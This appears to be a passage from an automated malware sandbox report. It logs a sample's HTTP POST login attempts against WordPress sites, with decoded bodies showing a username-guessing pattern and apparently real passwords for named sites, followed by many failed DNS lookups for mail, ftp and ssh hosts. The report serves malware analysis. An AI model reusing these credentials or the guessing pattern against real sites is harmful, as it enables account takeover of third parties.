Source: global trafficHTTP traffic detected: POST /wp/wp-login.php HTTP/1.1Host: www.ceuandalucia.esAccept: */*Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP+Cookie+check; wordpress_test_cookie=WP+Cookie+checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.ceuandalucia.es/wp/wp-login.phpContent-Length: 138Content-Type: application/x-www-form-urlencoded
Source: global trafficHTTP traffic detected: POST /wp-login.php HTTP/1.1Host: gruporegiosafety.comAccept: */*Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20check; tk_ai=jetpack%3AKIbxliTbCWm3cOu8N5Br803SUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://gruporegiosafety.com/wp-login.phpContent-Length: 147Content-Type: application/x-www-form-urlencoded
Source: global trafficHTTP traffic detected: POST /wp-login.php HTTP/1.1Host: gccb.co.inAccept: */*Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://gccb.co.in/wp-login.phpContent-Length: 126Content-Type: application/x-www-form-urlencoded
Source: global trafficHTTP traffic detected: POST /wp-login.php HTTP/1.1Host: hmichaelandco.comAccept: */*Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://hmichaelandco.com/wp-login.phpContent-Length: 135Content-Type: application/x-www-form-urlencodedData Raw: 6c 6f 67 3d 61 64 65 79 69 6e 6b 61 26 70 77 64 3d 74 61 6a 75 64 65 65 6e 32 38 37 30 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 25 33 41 25 32 46 25 32 46 68 6d 69 63 68 61 65 6c 61 6e 64 63 6f 2e 63 6f 6d 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31 Data Ascii: log=adeyinka&pwd=tajudeen2870&rememberme=forever&wp-submit=Log+In&redirect_to=http%3A%2F%2Fhmichaelandco.com%2Fwp-admin%2F&testcookie=1
Source: global trafficHTTP traffic detected: POST /wp-login.php HTTP/1.1Host: hmichaelandco.comAccept: */*Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://hmichaelandco.com/wp-login.phpContent-Length: 155Content-Type: application/x-www-form-urlencodedData Raw: 6c 6f 67 3d 61 64 65 79 69 6e 6b 61 25 34 30 68 6d 69 63 68 61 65 6c 61 6e 64 63 6f 2e 63 6f 6d 26 70 77 64 3d 74 61 6a 75 64 65 65 6e 32 38 37 30 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 25 33 41 25 32 46 25 32 46 68 6d 69 63 68 61 65 6c 61 6e 64 63 6f 2e 63 6f 6d 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31 Data Ascii: log=adeyinka%40hmichaelandco.com&pwd=tajudeen2870&rememberme=forever&wp-submit=Log+In&redirect_to=http%3A%2F%2Fhmichaelandco.com%2Fwp-admin%2F&testcookie=1
Source: global trafficHTTP traffic detected: POST /wp-login.php HTTP/1.1Host: micro-design.comAccept: */*Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://micro-design.com/wp-login.phpContent-Length: 128Content-Type: application/x-www-form-urlencodedData Raw: 6c 6f 67 3d 6c 6f 72 69 67 26 70 77 64 3d 25 32 33 67 61 72 62 6f 31 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 25 33 41 25 32 46 25 32 46 6d 69 63 72 6f 2d 64 65 73 69 67 6e 2e 63 6f 6d 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31 Data Ascii: log=lorig&pwd=%23garbo1&rememberme=forever&wp-submit=Log+In&redirect_to=http%3A%2F%2Fmicro-design.com%2Fwp-admin%2F&testcookie=1
Source: global trafficHTTP traffic detected: POST /wp-login.php HTTP/1.1Host: micro-design.comAccept: */*Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://micro-design.com/wp-login.phpContent-Length: 147Content-Type: application/x-www-form-urlencodedData Raw: 6c 6f 67 3d 6c 6f 72 69 67 25 34 30 6d 69 63 72 6f 2d 64 65 73 69 67 6e 2e 63 6f 6d 26 70 77 64 3d 25 32 33 67 61 72 62 6f 31 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 25 33 41 25 32 46 25 32 46 6d 69 63 72 6f 2d 64 65 73 69 67 6e 2e 63 6f 6d 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31 Data Ascii: log=lorig%40micro-design.com&pwd=%23garbo1&rememberme=forever&wp-submit=Log+In&redirect_to=http%3A%2F%2Fmicro-design.com%2Fwp-admin%2F&testcookie=1
Source: global trafficHTTP traffic detected: POST /wp-login.php HTTP/1.1Host: hmichaelandco.comAccept: */*Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://hmichaelandco.com/wp-login.phpContent-Length: 132Content-Type: application/x-www-form-urlencodedData Raw: 6c 6f 67 3d 61 64 6d 69 6e 26 70 77 64 3d 74 61 6a 75 64 65 65 6e 32 38 37 30 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 25 33 41 25 32 46 25 32 46 68 6d 69 63 68 61 65 6c 61 6e 64 63 6f 2e 63 6f 6d 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31 Data Ascii: log=admin&pwd=tajudeen2870&rememberme=forever&wp-submit=Log+In&redirect_to=http%3A%2F%2Fhmichaelandco.com%2Fwp-admin%2F&testcookie=1
Source: global trafficHTTP traffic detected: POST /wp-login.php HTTP/1.1Host: micro-design.comAccept: */*Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://micro-design.com/wp-login.phpContent-Length: 128Content-Type: application/x-www-form-urlencodedData Raw: 6c 6f 67 3d 61 64 6d 69 6e 26 70 77 64 3d 25 32 33 67 61 72 62 6f 31 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 25 33 41 25 32 46 25 32 46 6d 69 63 72 6f 2d 64 65 73 69 67 6e 2e 63 6f 6d 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31 Data Ascii: log=admin&pwd=%23garbo1&rememberme=forever&wp-submit=Log+In&redirect_to=http%3A%2F%2Fmicro-design.com%2Fwp-admin%2F&testcookie=1
Source: global trafficHTTP traffic detected: POST /wp-login.php HTTP/1.1Host: micro-design.comAccept: */*Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://micro-design.com/wp-login.phpContent-Length: 136Content-Type: application/x-www-form-urlencodedData Raw: 6c 6f 67 3d 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 26 70 77 64 3d 25 32 33 67 61 72 62 6f 31 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 25 33 41 25 32 46 25 32 46 6d 69 63 72 6f 2d 64 65 73 69 67 6e 2e 63 6f 6d 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31 Data Ascii: log=administrator&pwd=%23garbo1&rememberme=forever&wp-submit=Log+In&redirect_to=http%3A%2F%2Fmicro-design.com%2Fwp-admin%2F&testcookie=1
Source: global trafficHTTP traffic detected: POST /wp-login.php HTTP/1.1Host: hmichaelandco.comAccept: */*Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://hmichaelandco.com/wp-login.phpContent-Length: 140Content-Type: application/x-www-form-urlencodedData Raw: 6c 6f 67 3d 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 26 70 77 64 3d 74 61 6a 75 64 65 65 6e 32 38 37 30 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 25 33 41 25 32 46 25 32 46 68 6d 69 63 68 61 65 6c 61 6e 64 63 6f 2e 63 6f 6d 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31 Data Ascii: log=administrator&pwd=tajudeen2870&rememberme=forever&wp-submit=Log+In&redirect_to=http%3A%2F%2Fhmichaelandco.com%2Fwp-admin%2F&testcookie=1
Source: global trafficHTTP traffic detected: POST /wp-login.php HTTP/1.1Host: micro-design.comAccept: */*Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://micro-design.com/wp-login.phpContent-Length: 135Content-Type: application/x-www-form-urlencodedData Raw: 6c 6f 67 3d 6d 69 63 72 6f 2d 64 65 73 69 67 6e 26 70 77 64 3d 25 32 33 67 61 72 62 6f 31 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 25 33 41 25 32 46 25 32 46 6d 69 63 72 6f 2d 64 65 73 69 67 6e 2e 63 6f 6d 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31 Data Ascii: log=micro-design&pwd=%23garbo1&rememberme=forever&wp-submit=Log+In&redirect_to=http%3A%2F%2Fmicro-design.com%2Fwp-admin%2F&testcookie=1
Source: global trafficHTTP traffic detected: POST /wp-login.php HTTP/1.1Host: hmichaelandco.comAccept: */*Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://hmichaelandco.com/wp-login.phpContent-Length: 140Content-Type: application/x-www-form-urlencodedData Raw: 6c 6f 67 3d 68 6d 69 63 68 61 65 6c 61 6e 64 63 6f 26 70 77 64 3d 74 61 6a 75 64 65 65 6e 32 38 37 30 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 25 33 41 25 32 46 25 32 46 68 6d 69 63 68 61 65 6c 61 6e 64 63 6f 2e 63 6f 6d 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31 Data Ascii: log=hmichaelandco&pwd=tajudeen2870&rememberme=forever&wp-submit=Log+In&redirect_to=http%3A%2F%2Fhmichaelandco.com%2Fwp-admin%2F&testcookie=1
Source: global trafficHTTP traffic detected: POST /wp-login.php HTTP/1.1Host: micro-design.comAccept: */*Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://micro-design.com/wp-login.phpContent-Length: 132Content-Type: application/x-www-form-urlencodedData Raw: 6c 6f 67 3d 25 32 33 67 61 72 62 6f 31 26 70 77 64 3d 25 32 33 67 61 72 62 6f 31 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 25 33 41 25 32 46 25 32 46 6d 69 63 72 6f 2d 64 65 73 69 67 6e 2e 63 6f 6d 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31 Data Ascii: log=%23garbo1&pwd=%23garbo1&rememberme=forever&wp-submit=Log+In&redirect_to=http%3A%2F%2Fmicro-design.com%2Fwp-admin%2F&testcookie=1
Source: global trafficHTTP traffic detected: POST /wp-login.php HTTP/1.1Host: hmichaelandco.comAccept: */*Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://hmichaelandco.com/wp-login.phpContent-Length: 139Content-Type: application/x-www-form-urlencodedData Raw: 6c 6f 67 3d 74 61 6a 75 64 65 65 6e 32 38 37 30 26 70 77 64 3d 74 61 6a 75 64 65 65 6e 32 38 37 30 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 25 33 41 25 32 46 25 32 46 68 6d 69 63 68 61 65 6c 61 6e 64 63 6f 2e 63 6f 6d 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31 Data Ascii: log=tajudeen2870&pwd=tajudeen2870&rememberme=forever&wp-submit=Log+In&redirect_to=http%3A%2F%2Fhmichaelandco.com%2Fwp-admin%2F&testcookie=1
Tries to resolve many domain names, but no domain seems valid
Source: unknownDNS traffic detected: query: relay.ardcrushing.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: tnav.ru replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.sofia-communications.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.rochester-gauges.be replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ssh.student.ub.ac.id replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ssh.kvsroraipur.in replaycode: Name error (3)
Source: unknownDNS traffic detected: query: relay.member3.co.za replaycode: Name error (3)
Source: unknownDNS traffic detected: query: imap.yahoo.comfreezed replaycode: Name error (3)
Source: unknownDNS traffic detected: query: imap.foundtoo.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mailgate.lwindowelive.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.matttux.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.heathcotebarr.eu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pop.privatemoe.ae replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.lgs-strategies.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mail.paintd.plus.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pop3.member3.co.za replaycode: Name error (3)
Source: unknownDNS traffic detected: query: relay.elitebusinesshn.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.elitebusinesshn.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.leeberg.dk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mailgate.lgs-strategies.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mailgate.sofia-communications.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.xtsagency.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mail.yahoo.comfreezed replaycode: Name error (3)
Source: unknownDNS traffic detected: query: imap.kvsroraipur.in replaycode: Name error (3)
Source: unknownDNS traffic detected: query: imap.sofia-communications.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: imap.lgs-strategies.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mailgate.heathcotebarr.eu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pop.gmail.io replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ssh.cringemonster.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: imap.2l7g4s.us replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ssh.bosworthacademy.org replaycode: Server failure (2)
Source: unknownDNS traffic detected: query: mail.maxiv.lu.se replaycode: Name error (3)
Source: unknownDNS traffic detected: query: matttux.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.goldenfishcompany.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mailgate.yahoo.comfreezed replaycode: Name error (3)
Source: unknownDNS traffic detected: query: relay.highstreet-re.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pop.lwindowelive.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ssh.member3.co.za replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ssh.utlinks.om replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mailgate.edgewater.group replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mail.kvsroraipur.in replaycode: Name error (3)
Source: unknownDNS traffic detected: query: imap.ardcrushing.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ssh.schor.be replaycode: Name error (3)
Source: unknownDNS traffic detected: query: sofia-communications.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pop.mnit.uc.in replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pop.y3.qj51acp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pop.yahoo.comfreezed replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mailgate.utlinks.om replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ssh.paintd.plus.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ssh.ardcrushing.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ssh.pixiil.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mailgate.kvsroraipur.in replaycode: Name error (3)
Source: unknownDNS traffic detected: query: imap.mnit.uc.in replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pop3.cringemonster.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.yahoo.comfreezed replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pop3.carelesscommunity.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 2l7g4s.us replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.firemailbox.club replaycode: Name error (3)
Source: unknownDNS traffic detected: query: elitebusinesshn.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: relay.ibright.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ssh.macisis.co.uk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pop.ibright.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.ippals.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mail.heathcotebarr.eu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: yahoo.comfreezed replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ssh.schmith.net replaycode: Server failure (2)
Source: unknownDNS traffic detected: query: mailgate.mnit.uc.in replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.talentius.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mail.lgs-strategies.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ssh.lwindowelive.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.student.ub.ac.id replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ssh.sofia-communications.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.2brosandahosepressurewashing.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ssh.chandigarhuniversityazure.onmicrosoft.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.hightideinc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: smtp.privatemoe.ae replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.dstaq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: smtp.gmail.io replaycode: Name error (3)
Source: unknownDNS traffic detected: query: y3.qj51acp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: relay.bayambnag.gov.ph replaycode: Name error (3)
Source: unknownDNS traffic detected: query: imap.gstudent.ctu.edu.vn replaycode: Name error (3)
Source: unknownDNS traffic detected: query: schmith.net replaycode: Server failure (2)
Source: unknownDNS traffic detected: query: mail.mnit.uc.in replaycode: Name error (3)
Source: unknownDNS traffic detected: query: smtp.lwindowelive.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lwindowelive.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pop.highstreet-re.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: relay.lgs-strategies.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: smtp.schmith.net replaycode: Server failure (2)
Source: unknownDNS traffic detected: query: relay.kvsroraipur.in replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.macisis.co.uk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: paintd.plus.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mail.foundtoo.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pop3.lwindowelive.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ssh.adm.uksw.edu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: smtp.kvsroraipur.in replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ssh.elitebusinesshn.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pop.cringemonster.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pop.xtsagency.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ssh.dbschooldelhi.ac.in replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ssh.ibright.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: relay.adm.uksw.edu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.svenssonfriends.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pop3.dbschooldelhi.ac.in replaycode: Name error (3)
Source: unknownDNS traffic detected: query: relay.sofia-communications.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.edgewater.group replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ssh.foundtoo.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: relay.xtsagency.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pop3.edgewater.group replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lgs-strategies.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pop3.adm.uksw.edu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.utlinks.om replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mail.bosworthacademy.org replaycode: Server failure (2)
Source: unknownDNS traffic detected: query: relay.paintd.plus.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: carelesscommunity.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.ardcrushing.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.schor.be replaycode: Name error (3)
Source: unknownDNS traffic detected: query: imap.xtsagency.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: smtp.ardcrushing.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.aoiit.store replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.cringemonster.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: relay.2l7g4s.us replaycode: Name error (3)
Source: unknownDNS traffic detected: query: smtp.bosworthacademy.org replaycode: Server failure (2)
Source: unknownDNS traffic detected: query: relay.edgewater.group replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mail.privatemoe.ae replaycode: Name error (3)
Source: unknownDNS traffic detected: query: smtp.2l7g4s.us replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ssh.ippals.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: smtp.yahoo.comfreezed replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ssh.gmail.io replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ssh.matttux.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: relay.utlinks.om replaycode: Name error (3)
Source: unknownDNS traffic detected: query: imap.y3.qj51acp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: relay.gmail.io replaycode: Name error (3)
Source: unknownDNS traffic detected: query: imap.paintd.plus.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: imap.bosworthacademy.org replaycode: Server failure (2)
Source: unknownDNS traffic detected: query: pop3.xtsagency.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mail.ibright.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: utlinks.om replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.greenrworld.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mailgate.xtsagency.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.nyklawfirm.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 5.e9mbw4gh replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.y3.qj51acp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ssh.y3.qj51acp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.highstreet-re.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mailgate.2l7g4s.us replaycode: Name error (3)
Source: unknownDNS traffic detected: query: smtp.lgs-strategies.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mailgate.cringemonster.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.dbschooldelhi.ac.in replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ssh.xtsagency.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: relay.y3.qj51acp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mailgate.bosworthacademy.org replaycode: Server failure (2)
Source: unknownDNS traffic detected: query: member3.co.za replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mail.2l7g4s.us replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ssh.carelesscommunity.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: bosworthacademy.org replaycode: Server failure (2)
Source: unknownDNS traffic detected: query: mail.xtsagency.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pop3.privatemoe.ae replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pop.foundtoo.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: relay.heathcotebarr.eu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.gmailvz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.kvsroraipur.in replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.gstudent.ctu.edu.vn replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mailgate.gmail.io replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pop.member3.co.za replaycode: Name error (3)
Source: unknownDNS traffic detected: query: smtp.foundtoo.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mailgate.paintd.plus.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: relay.privatemoe.ae replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ssh.highstreet-re.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: relay.carelesscommunity.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pop3.ardcrushing.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: relay.cringemonster.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: highstreet-re.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ms86978078.msv1.invalid replaycode: Name error (3)
Source: unknownDNS traffic detected: query: imap.gmail.io replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mail.ardcrushing.com replaycode: Name error (3)
